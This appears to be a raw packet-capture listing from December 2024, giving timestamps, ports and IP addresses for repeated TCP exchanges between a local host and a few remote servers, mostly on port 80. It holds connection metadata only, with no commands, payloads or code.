Dec 9, 2024 08:08:52.036847115 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.036886930 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.038683891 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.038697004 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.038728952 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.040477991 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.040489912 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.040501118 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.040549040 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.042217016 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.042236090 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.042285919 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.044059038 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.044081926 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.044137955 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.045799971 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.045811892 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.045842886 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.047540903 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.047559023 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.047569036 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.047610998 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.049349070 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.049361944 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.049403906 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.051034927 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.051047087 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.051083088 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.052757025 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.052769899 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.052937031 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.054470062 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.054481983 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.057837009 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.059505939 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.059519053 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.059528112 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.060293913 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.060435057 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.061166048 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.061177015 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.061212063 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.062815905 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.062828064 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.062858105 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.064588070 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.064600945 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.064635038 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.066082001 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.066092968 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.066111088 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.066128016 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.066154957 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.067702055 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.067714930 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.069293976 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.069313049 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.070929050 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.070941925 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.072523117 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.072535038 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.074062109 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.074074984 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.074085951 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.075675964 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.075687885 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.077250957 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.077263117 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.078799009 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.078816891 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.080393076 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.080405951 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.080415964 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.081372023 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.081862926 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.081897974 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.081971884 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.085131884 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.085145950 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.085515976 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.088288069 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.089826107 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.089843988 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.091497898 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.091511011 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.093125105 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.093137980 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.093147039 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.094538927 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.094552040 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.096174002 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.096185923 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.097723961 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.097737074 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.099291086 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.099303961 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.100876093 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.100889921 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.100902081 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.102467060 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.102478981 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.102581978 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.102581978 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.102596998 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.104033947 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.104047060 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.104101896 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.105571985 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.105583906 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.105617046 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.106106043 CET	5200	49888	185.157.162.216	192.168.2.4
Dec 9, 2024 08:08:52.145098925 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.197676897 CET	80	49889	185.215.113.43	192.168.2.4
Dec 9, 2024 08:08:52.208539009 CET	49889	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:52.210896969 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.211272001 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.211977959 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.212686062 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.213407993 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.213418961 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.214816093 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.214833975 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.216237068 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.216248989 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.217694044 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.217705965 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.219167948 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.219180107 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.220503092 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.220515013 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.221915960 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.221929073 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.223337889 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.223349094 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.224788904 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.224800110 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.225215912 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.225341082 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.225341082 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.226345062 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.226356983 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.227910995 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.227925062 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.228669882 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.229528904 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.229541063 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.231062889 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.231076002 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.232619047 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.232639074 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.232650042 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.234213114 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.234225035 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.235785007 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.235796928 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.237381935 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.237394094 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.238950014 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.238961935 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.238971949 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.240545988 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.240559101 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.242126942 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.242139101 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.243683100 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.243695974 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.245244026 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.245256901 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.246792078 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.246812105 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.248397112 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.248409033 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.248975992 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.249978065 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.249990940 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.251589060 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.251601934 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.253127098 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.253139973 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.254707098 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.254719019 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.254729986 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.256283045 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.256295919 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.257853031 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.257865906 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.259440899 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.259454012 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.261073112 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.261085033 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.262634039 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.262665987 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.262676001 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.263581038 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.263678074 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.263776064 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.263926983 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.263945103 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.264189959 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.264202118 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.264271021 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.265758038 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.265770912 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.267323017 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.267335892 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.268888950 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.268923998 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.268935919 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.269022942 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.270473003 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.270486116 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.272034883 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.273684025 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.273695946 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.275221109 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.275233030 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.276777029 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.276788950 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.278284073 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.278356075 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.278357983 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.278363943 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.278522015 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.279943943 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.279957056 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.281049967 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.281510115 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.281522036 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.281533003 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.281560898 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.283129930 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.283143044 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.284661055 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.284672976 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.286238909 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.286250114 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.287884951 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.287895918 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.291960001 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.372092009 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.403522968 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.403783083 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.404484034 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.405190945 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.405426979 CET	49901	443	192.168.2.4	34.160.144.191
Dec 9, 2024 08:08:52.405467987 CET	443	49901	34.160.144.191	192.168.2.4
Dec 9, 2024 08:08:52.405906916 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.405917883 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.407371044 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.407382965 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.408759117 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.408771992 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.410171032 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.410182953 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.410455942 CET	49901	443	192.168.2.4	34.160.144.191
Dec 9, 2024 08:08:52.410456896 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.410516024 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.411592007 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.411606073 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.413167000 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.413178921 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.414455891 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.414467096 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.415846109 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.415858030 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.417247057 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.417259932 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.418845892 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.418858051 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.420473099 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.420485973 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.421994925 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.422008038 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.423568010 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.423582077 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.425170898 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.425184011 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.426745892 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.426759005 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.428333044 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.429964066 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.430712938 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.431544065 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.431566000 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.433063030 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.433075905 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.434657097 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.434669018 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.436228037 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.436240911 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.437793970 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.437808037 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.437818050 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.438004971 CET	49901	443	192.168.2.4	34.160.144.191
Dec 9, 2024 08:08:52.438023090 CET	443	49901	34.160.144.191	192.168.2.4
Dec 9, 2024 08:08:52.439361095 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.439373016 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.440938950 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.440952063 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.442492962 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.442504883 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.444061041 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.444073915 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.444083929 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.445667028 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.445678949 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.447227001 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.447237968 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.448801994 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.448813915 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.450407982 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.450422049 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.450917006 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:52.451987028 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.451998949 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.452009916 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.453542948 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.453555107 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.455110073 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.455121994 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.456691980 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.456703901 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.458239079 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.458271980 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.458283901 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.459810019 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.459830046 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.461503029 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.461514950 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.462986946 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.463000059 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.464557886 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.464576006 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.466116905 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.466129065 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.466140032 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.467705011 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.467716932 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.469258070 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:52.469273090 CET	80	49886	185.215.113.16	192.168.2.4
